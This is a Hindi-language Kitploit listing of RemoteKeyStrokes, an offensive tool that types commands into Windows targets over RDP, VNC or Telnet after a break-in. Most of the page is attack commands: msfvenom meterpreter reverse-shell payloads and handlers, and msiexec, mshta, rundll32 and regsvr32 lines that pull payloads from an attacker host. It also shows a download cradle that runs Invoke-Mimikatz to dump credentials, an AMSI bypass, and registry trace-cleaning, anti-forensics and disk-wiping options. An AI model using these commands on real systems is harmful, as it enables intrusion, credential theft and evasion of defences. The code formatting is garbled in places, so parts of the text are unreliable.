Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/u53rw4r3/remotekeystrokes
विशेषाधिकार वृद्धिपेलोड जनरेशनस्थायित्व तंत्रपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubu53rw4r3/remotekeystrokes

RemoteKeyStrokes

एक स्क्रिप्ट जो ग्राफिकल डेस्कटॉप प्रोग्राम के माध्यम से कीस्ट्रोक्स को स्वचालित करती है।

रिपॉजिटरी देखें
3541 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RemoteKeyStrokes

एक स्क्रिप्ट जो सक्रिय रिमोट डेस्कटॉप सत्र के माध्यम से कीस्ट्रोक्स को स्वचालित करती है, जो आक्रामक ऑपरेटरों को लिविंग ऑफ द लैंड तकनीकों के साथ संयोजन में सहायता करती है। सभी श्रेय nopernik को जाता है जिन्होंने इसे संभव बनाया, इसलिए मैंने इसे बेहतर बनाने का बीड़ा उठाया। मैं कुछ ऐसा चाहता था जो पोस्ट-एक्सप्लॉइटेशन चरण में रिमोट डेस्कटॉप के माध्यम से कमांड निष्पादित करते समय सहायता करे। संसाधनों को व्यवस्थित तरीके से एकत्र करने के लिए SCPA प्रोजेक्ट बनाना भी संभव था।

Features

  • कमांड निष्पादित करना
  • फ़ाइल स्थानांतरण
  • विशेषाधिकार वृद्धि (जल्द ही)
  • स्थिरता (जल्द ही)
  • एंटी-फोरेंसिक्स (जल्द ही)
  • मेयहेम (जल्द ही)

Installation

Dependencies

अपने पैकेज मैनेजर के अनुसार शेष निर्भरताएँ स्थापित करें।``` $ sudo apt install -y xfreerdp-x11 remmina xdotool

$ sudo dnf install -y xdotool freerdp-2 remmina

$ sudo pacman -S freerdp remmina xdotool

$ sudo emerge xwayland freerdp remmina xdotool

$ sudo nix-env -iA nixpkgs.xwayland nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina

root@kitploit:~
### सेटअप

सिस्टम में प्रोग्राम इंस्टॉल करें और `rks` को `remotekeystrokes` का एक सिम्बॉलिक लिंक बनाएं। इसका उपयोग कमांड उपनाम के रूप में किया जाएगा।```
$ sudo wget -O /usr/local/src/remotekeystrokes.sh https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/rks && \
sudo chmod 755 /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes /usr/local/bin/rks

सहायता मेनू```

$ remotekeystrokes -h Usage: remotekeystrokes

Flags:

COMMON OPTIONS: -c, --command <command | file> Specify a command or a file contains commands to execute

root@kitploit:~
-p, --platform <operating_system>   Specify the operating system ("windows" is
                                    set by default if not specified)

-w, --windowname <window_name>      Specify the window name to focus on the
                                    active window ("freerdp" is set by default
                                    if not specified)

-h, --help                          Display this help message

UPLOAD FILES: -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer

METHODS: -m, --method Specify a method. For command execution method "none" is set by default if not specified. For file transfer "pwshb64" is set by default if not specified. Other available methods are: "elevate", "persistence", "antiforensics", and "mayhem"

root@kitploit:~
-s, --submethod <submethod>         Specify a submethod from a method (applies
                                    with -m flag)

-a, --action <action>               Specify an action from a method and/or
                                    submethod (applies with -m and/or -s flag)

-e, --evasion <evasion>             Specify an evasion method for uploading files
                                    (only works for "pwshb64")
root@kitploit:~
## उपयोग

### 0x00 - दूरस्थ प्रमाणीकरण

#### प्रतीक

- डॉलर चिह्न (`$`) एक unix शेल प्रॉम्प्ट को इंगित करता है जिसमें सामान्य उपयोगकर्ता विशेषाधिकार होते हैं, और इसमें कमांड शामिल होते हैं।

- कोण कोष्ठक (`<>`) का अर्थ अनिवार्य पैरामीटर है।

- वर्ग कोष्ठक (`[]`) का अर्थ वैकल्पिक पैरामीटर है, यदि निर्दिष्ट करना आवश्यक न हो।

#### RDP

आधुनिक ऑपरेटिंग सिस्टम को प्रमाणित करने के लिए, या तो TLS `/sec:tls` के रूप में प्रमाणीकरण को बाध्य करने के लिए फ़्लैग निर्दिष्ट करें या NLA `/sec:nla` के रूप में प्रमाणीकरण।```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]

पुराने ऑपरेटिंग सिस्टम को प्रमाणित करने के लिए फ़्लैग /sec:rdp निर्दिष्ट करें ताकि पुरानी प्रमाणीकरण बाध्य हो।``` $ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"" /p:"" /v::[]

root@kitploit:~
#### VNC

VNC मशीन को दूरस्थ रूप से प्रमाणित करने के लिए।```
$ remmina -c vnc://<username>:<password>@<IP>

SSH```

$ ssh [-p ] @

root@kitploit:~
#### Telnet```
$ telnet <IP> [PORT]

जब RemoteKeyStrokes का उपयोग करें

प्रमाणित रिमोट सत्र के साथ विंडोज टार्गेट पर कमांड निष्पादित करने के लिए remotekeystrokes (या एक उपनाम कमांड rks) का उपयोग करने के लिए। उन्हें निष्पादित करने से पहले आपको एक विंडो नाम (-w) के साथ नेविगेट करना होगा, डिफ़ॉल्ट रूप से xfreerdp का उपयोग करते समय यह FreeRDP खोजेगा। भिन्न रिमोट लॉगिन प्रोग्राम वाले सिस्टम को लक्षित करते समय विंडो नाम निर्दिष्ट करना सुनिश्चित करें। कमांड जारी करने के लिए -c फ्लैग निर्दिष्ट करें। आप कमांड डालने के लिए एक टेक्स्ट फ़ाइल भी तैयार कर सकते हैं और यह उन्हें एक-एक करके पढ़ेगा। फ्लैग जांचेगा कि यह एक स्ट्रिंग है या फ़ाइल।

ग्राफिकल रिमोट डेस्कटॉप प्रोग्राम जैसे FreeRDP, Remmina, और अन्य तृतीय-पक्ष प्रोग्राम के लिए। telnet और ssh जैसे रिमोट टर्मिनल सत्रों के विपरीत। आपको टार्गेट मशीन के अंदर एक सक्रिय एप्लिकेशन पर कर्सर नेविगेट करना होगा। उदाहरण के लिए, विंडोज वातावरण में आपको एक कमांड प्रॉम्प्ट (cmd.exe) या पावरशेल (powershell.exe) खोलना होगा। विंडोज के लिए त्वरित लॉन्च के लिए डायलॉग बॉक्स (-m dialogbox) के साथ प्रोग्राम खोलना संभव है। जब आपने शुरू में इस विधि से निष्पादित किया था तो रजिस्ट्री प्रविष्टि से निशान साफ़ करना सुनिश्चित करें। यह HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU में स्थित है। आप उदाहरण देखेंगे कि आप केवल Living off the Land (LotL) तकनीकों के साथ त्वरित आक्रामक उपाय कैसे कर सकते हैं।

0x01 - आंतरिक टोही

कमांड प्रॉम्प्ट

स्थानीय मशीन की गणना।``` $ cat recon_local_enum_cmds.txt whoami /all net user net localgroup Administrators ipconfig /all systeminfo

$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!

$ rks -c recon_local_enum_cmds.txt [*] Executing commands... [+] Task completed!

root@kitploit:~
एक आदेश में निष्पादित करने के लिए। यह विशेष रूप से तब संक्षिप्त होता है जब एक डायलॉग बॉक्स के साथ उपयोग किया जाता है।```
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

एक्टिव डायरेक्टरी गणना.``` $ cat recon_ad_enum_cmds.txt net user /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain net group "Domain Computers" /domain

$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!

$ rks -c recon_ad_enum_cmds.txt [*] Executing commands... [+] Task completed!

root@kitploit:~
एकल कमांड में निष्पादित करने के लिए। यह विशेष रूप से एक डायलॉग बॉक्स के साथ उपयोग करने पर संक्षिप्त है।```
$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!

Powershell

स्थानीय मशीन गणना (TODO)``` $ cat recon_local_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_local_enum_cmdlets.txt

root@kitploit:~
सक्रिय निर्देशिका गणना (TODO)```
$ cat recon_ad_enum_cmdlets.txt

$ rks -c "powershell.exe" -m dialogbox

$ rks -c recon_ad_enum_cmdlets.txt

0x02 - पेलोड निष्पादित करें

विंडोज

पावरशेल की सामग्री पढ़ते हुए पेलोड निष्पादित करें।``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f psh -o payload.ps1

$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"

$ rks -c "powershell.exe" -m dialogbox

$ rks -c payload.ps1

root@kitploit:~
एक powershell oneliner पेलोड को `metasploit-framework` एक्सप्लॉइट मॉड्यूल `exploit/multi/script/web_delivery` का उपयोग करके निष्पादित करें।```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"

$ rks -c "cmd.exe" -m dialogbox

$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"

पेलोड को msiexec.exe के साथ निष्पादित करें जबकि एक वेबसर्वर होस्ट कर रहे हों।``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f msi -o payload.msi

$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"

$ sudo python -m http.server 80

$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/payload.msi" -m dialogbox

root@kitploit:~
पेलोड को `mshta.exe` के साथ चलाएं, `metasploit-framework` के शोषण मॉड्यूल `exploit/windows/misc/hta_server` का उपयोग करके।```
$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> run"

$ rks -c "mshta.exe http://<attacker_IP>:<attacker_PORT>/payload.hta" -m dialogbox

रन्डीएल३२.एक्सई के साथ पेलोड निष्पादित करें, metasploit-framework के exploit/windows/smb/smb_delivery एक्सप्लॉइट मॉड्यूल का उपयोग करते हुए।``` $ sudo msfconsole -qx "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 8443; set srvhost <server_IP>; set file_name payload.dll; set share staging; run"

$ rks -c "rundll32.exe \<attacker_IP>\staging\payload.dll,0" -m dialogbox

root@kitploit:~
पेलोड को `regsvr32.exe` के साथ निष्पादित करें `metasploit-framework` का उपयोग करके शोषण मॉड्यूल `exploit/multi/script/web_delivery`।```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 3; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"

$ rks -c "regsvr32 /s /n /u /i://http://<attacker_IP>:<attacker_PORT>/payload.sct scrobj.dll" -m dialogbox

क्रॉस प्लेटफ़ॉर्म

निष्पादित करें और इम्प्लांट करें python का उपयोग करके metasploit-framework के एक्सप्लॉइट मॉड्यूल exploit/multi/script/web_delivery के साथ।``` $ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 0; set payload python/meterpreter/reverse_tcp; set lhost ; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"

$ rks -c "python -c """

root@kitploit:~
### 0x03 - फ़ाइल स्थानांतरण

कुल 11 फ़ाइल स्थानांतरण विधियाँ हैं।

|     Method     |      Platform     | विवरण |
| -------------- | ----------------- | ----------- |
|   `pwshb64`    | Windows and Linux | फ़ाइल को base64 में एनकोड करता है और फिर powershell के साथ डीकोड करता है। |
|    `cmdb64`    |      Windows      | एनकोडेड base64 फ़ाइल की सामग्री को आउटपुट करने के लिए `copy con` का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
|    `nixb64`    |       Unix        | base64 सामग्री को एक फ़ाइल में डीकोड करता है। |
|   `outfile`    | Windows and Linux | टेक्स्ट फ़ाइल को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है। |
|  `outfileb64`  |      Windows      | एनकोडेड base64 फ़ाइल की सामग्री को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
|   `copycon`    |      Windows      | टेक्स्ट फ़ाइल को आउटपुट करने के लिए `copy con` कमांड का उपयोग करता है। |
|   `pwshhex`    | Windows and Linux | फ़ाइल को हेक्साडेसिमल में एनकोड करता है और फिर powershell के साथ डीकोड करता है। |
|    `cmdhex`    |      Windows      | एक वेरिएबल में हेक्स एनकोडेड वन-लाइनर आउटपुट करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
|  `copyconhex`  |      Windows      | एनकोडेड हेक्सडंप फ़ाइल की सामग्री को आउटपुट करने के लिए `copy con` का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
|   `nixhex`     |       Unix        | एक वेरिएबल में हेक्स एनकोडेड वन-लाइनर आउटपुट करता है, फिर `\x` अनुक्रम वर्ण की व्याख्या करने के लिए `echo -e` के साथ डीकोड करता है। यह IoT उपकरणों के साथ व्यवहार करते समय उपयुक्त है, विशेषकर जब Telnet में फ़ाइल स्थानांतरण की सुविधा का अभाव हो।|
|  `outfilehex`  |      Windows      | एनकोडेड हेक्सडंप फ़ाइल की सामग्री को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |

एक अलग नेटवर्क में पिवोट करते समय दूरस्थ रूप से फ़ाइल अपलोड करें। यदि आप Windows पर दूरस्थ पथ निर्दिष्ट करना चाहते हैं तो कोट्स शामिल करना सुनिश्चित करें। डिफ़ॉल्ट रूप से यदि निर्दिष्ट नहीं किया गया है तो यह फ़ाइलों को स्थानांतरित करने के लिए Powershell base64 का उपयोग करता है। इसमें ड्रॉपर भी शामिल हैं, भले ही आकार बड़ा हो। ध्यान रखें कि फ़ाइल स्थानांतरण पूरा होने में समय लगेगा।```
$ rks -c "powershell.exe" -m dialogbox

$ rks -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
[*] Transferring file...
[+] File transferred!

To transfer droppers you can use CertUtil.exe base64 especially if it's large.``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=8443 -f exe -o payload.exe

root@kitploit:~
ड्रॉपर्स को powershell के माध्यम से `CertUtil.exe` base64 के साथ स्थानांतरित करने के लिए।```
$ rks -c "powershell.exe" -m dialogbox

$ rks -i payload.exe -o payload.exe -m outfileb64

पुराने ऑपरेटिंग सिस्टमों के लिए भी फ़ाइलें स्थानांतरित करना संभव है, जैसे Windows XP जिसमें कमांड प्रॉम्प्ट को छोड़कर पॉवरशेल नहीं है।``` $ rks -c "cmd.exe" -m dialogbox

$ rks -i payload.exe -o payload.exe -m cmdb64

root@kitploit:~
अपने C2 लिसनर को सक्रिय करें और पेलोड को निष्पादित करें।```
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp set lhost <IP>; set lport 8443; run"

$ rks -c ".\payload.exe"

फ़ाइलों को स्थानांतरित करने का एक और तरीका, विशेष रूप से sysadmin और आक्रामक उपकरणों के लिए। आइए PsExec64.exe को एक उदाहरण के रूप में लें, जो हमें पार्श्व गति के लिए आवश्यक है। बिना रुकावट के टेक्स्ट के माध्यम से अपलोड करने में बहुत समय लगेगा। इसके बजाय सबसे तेज़ तरीका है कि WebDAV को माउंट किया जाए जो sysinternals सूट टूलकिट (live.sysinternals.com) की वैध वेबसाइट से संबंधित है। फ़ाइल एक्सप्लोरर का उपयोग करने के बजाय, जो कमांड निष्पादित करने की तुलना में बहुत धीमा है। यहाँ कमांड प्रॉम्प्ट के लिए कमांड दिए गए हैं।``` $ cat commands.txt net use z: \live.sysinternals.com\tools copy z:\PsExec64.exe . net use z: /delete

$ rks -c "cmd.exe" -m dialogbox

$ rks -c commands.txt

root@kitploit:~
यहाँ विंडोज़ में `PsExec64.exe` स्थानांतरित करते समय powershell cmdlets के लिए एक और प्रकार है।```
$ cat cmdlets.txt
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\live.sysinternals.com\tools"
Copy-Item z:\PsExec64.exe .
Remove-PSDrive -Name Z

$ rks -c "powershell.exe" -m dialogbox

$ rks -c cmdlets.txt

पॉवरशेल के माध्यम से फ़ाइललेस मैलवेयर या आक्रामक उपकरणों को पुनर्प्राप्त करने का सबसे अच्छा तरीका केवल वैध वेबसाइटों जैसे https://github.com को होस्ट/प्राप्त करना और उसे निष्पादित करना है। आइए nishang से क्रैडल को डाउनलोड और निष्पादित करते हुए क्रेडेंशियल्स को पुनर्प्राप्त करने के लिए Invoke-Mimikatz का उपयोग करें।``` $ cat hashdump.txt IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1') Invoke-Mimikatz -DumpCreds

$ rks -c "powershell.exe" -m dialogbox

$ rks -c hashdump.txt

root@kitploit:~
यदि आपके पास बड़ी फाइलें हैं जिनके फ़ाइल ट्रांसफर पूरा होने का इंतजार करना लगभग असंभव है। `xfreerdp` `/drive:/path/to/directory/` फ़्लैग के साथ स्थानीय निर्देशिका को माउंट करने की अनुमति देता है। फिर फ़ाइल ब्राउज़र या शेल प्रॉम्प्ट में `\\tsclient\<share_name>\` पर नेविगेट करके सामग्री देखें।```
$ mkdir Tools

$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe Tools/

$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | rdp | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>] /drive:Tools

$ rks -c "cmd.exe" -m dialogbox

$ rks -c "dir \\tsclient\<share_name>\"

0x04 - विशेषाधिकार वृद्धि

नोट: WIP (कार्य प्रगति पर)``` $ rks -m elevate -s bypassuac -a info

$ rks -m elevate -s <sub_method>

root@kitploit:~
### 0x05 - दृढ़ता

नोट: WIP (कार्य प्रगति पर है)```
$ rks -m persistence -s createuser

$ rks -m persistence -s sethc

0x06 - सुरक्षा उपायों से बचाव

नोट: WIP (कार्य प्रगति पर है)

आप AMSI Bypass को पावरशेल इम्प्लांट के साथ जोड़कर विंडोज सुरक्षा या AMSI स्कैनर के साथ एकीकृत किसी भी सुरक्षा समाधान को दरकिनार कर सकते हैं।``` $ cat amsi_bypass.ps1 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

$ cat amsi_bypass.ps1 implant.ps1 > payload.ps1

$ rks -c "powershell.exe" -m dialogbox

$ rks -c payload.ps1

root@kitploit:~
कृपया अनुवाद के लिए मार्कडाउन सामग्री प्रदान करें।```
$ rks -m antiforensics -s wevutils

$ rks -m antiforensics -s winevent

$ rks -m antiforensics -s eventvwr

0x07 - Mayhem

नोट: WIP (कार्य प्रगति पर)``` $ rks -m mayhem -s diskpart -a info

$ rks -m mayhem -s diskpart -a cmd

$ rks -m mayhem -s diskpart -a pwsh

root@kitploit:~
### 0x08 - विंडो का नाम निर्दिष्ट करें।

यदि आप VNC, Telnet, या अन्य नेटवर्क प्रोटोकॉल को लक्षित कर रहे हैं तो आप विंडो का नाम निर्दिष्ट कर सकते हैं। यह उपयोगी है जब भी आप `remmina` या नाम बदली हुई विंडो वाले किसी अन्य टर्मिनल इंस्टेंस का उपयोग कर रहे हों।```
$ rks -c implant.ps1 -w <window_name>

FAQ (अक्सर पूछे जाने वाले प्रश्न)

इस परियोजना को शुरू करने का क्या कारण था?

जब मैं मैन्युअल रूप से अपने कीबोर्ड से टाइप करता हूं या अपने माउस से नेविगेट और क्लिक करता हूं, खासकर स्थानीय नेटवर्क के बाहर, तो यह बेहद धीमा होता है। मैं सिर्फ प्रक्रिया को गति देना चाहता हूं, खासकर नेटवर्क में घुसपैठ करते समय।

क्या यह सख्ती से केवल ग्राफिकल रिमोट डेस्कटॉप (जैसे RDP, VNC, आदि) के लिए है?

ज़रूरी नहीं। मैंने इसे Telnet जैसे रिमोट कंसोल के लिए भी संभव बनाया है, क्योंकि इसमें फ़ाइल स्थानांतरित करने की सुविधा का अभाव है।

क्या मैं अपनी परियोजनाओं या अपने शस्त्रागार के लिए अन्य तकनीकों का उपयोग कर सकता हूं?

तकनीकें सामान्य हैं और BadUSB, मैलवेयर डेवलपमेंट, या किसी अन्य संबंधित परियोजनाओं के लिए पुन: उपयोग की जा सकती हैं। यह GNU GPLv3 के कॉपीलेफ्ट लाइसेंस के अंतर्गत है जो आपको एक उपयोगकर्ता के रूप में यह अधिकार देता है कि आप देख सकें कि प्रोग्राम कैसे संचालित होता है, स्रोत कोड को अपनी आवश्यकताओं के अनुसार बदल सकें, और स्रोत कोड के साथ इसे अन्य उपयोगकर्ताओं को पुनर्वितरित कर सकें।

क्या यह wayland डिस्प्ले सर्वर के लिए उपलब्ध है?

फिलहाल xdotool का कोई विकल्प या प्रतिस्थापन खोजने के लिए कोई संगत waylands उपकरण नहीं है। dotool बहुत आशाजनक है, लेकिन इसमें विंडो पर फ़ोकस करने की एक विशिष्ट सुविधा का अभाव है। kdotool केवल KDE डेस्कटॉप वातावरण के लिए उपलब्ध है। मुझे इसे Go (चूंकि dotool मौजूद है) या pynput लाइब्रेरी के साथ Python में फिर से तैयार करना पड़ सकता है।

समस्या निवारण

आक्रामक उपकरण काम नहीं कर रहा है

जब आप पहली बार प्रोग्राम चलाते हैं, तो उसे कुछ स्व-व्याख्यात्मक संदेश प्रदर्शित करने चाहिए। x11 विंडो सर्वर पर स्विच करें। wayland समर्थित क्यों नहीं है, इसके लिए FAQ देखें।``` $ rks -c "powershell.exe" -m searchbox [ERROR] Wayland isn't supported! [*] Terminating program...

root@kitploit:~
### आक्रामक टूल को हटाएं

इसे हटाने के लिए।```
$ sudo rm -f /usr/local/bin/remotekeystrokes /usr/local/bin/rks

कार्यसूची और सहायता आवश्यक

  • AES256 एन्क्रिप्शन विधि को base64 के माध्यम से लागू करें

  • शेष अपलोड विधियों को लागू करें: Base32, Base2, Base10, Base8

  • विंडोज और लिनक्स दोनों के लिए privesc फ़ंक्शन लागू करें

  • विंडोज और लिनक्स दोनों के लिए एक पर्सिस्टेंस फ़ंक्शन लागू करें।

  • विंडोज और लिनक्स दोनों के लिए एंटीफॉरेंसिक्स फ़ंक्शन लागू करें।

  • विंडोज और लिनक्स दोनों के लिए मेयेहम फ़ंक्शन लागू करें।

संदर्भ

  • वीडियो: sethc.exe बैकडोर CMD पेलोड डिलीवरी (USB रबर डकी शैली)

  • मूल स्क्रिप्ट

  • VirtualRubberDucky

  • sticky_keys_hunter

श्रेय

  • nopernik

अस्वीकरण

यह आपकी जिम्मेदारी है, उपयोगकर्ता, आपके कार्यों के कारण के अनुसार। याद रखें कि महान शक्ति के साथ महान जिम्मेदारी आती है।

टूल डाउनलोड करें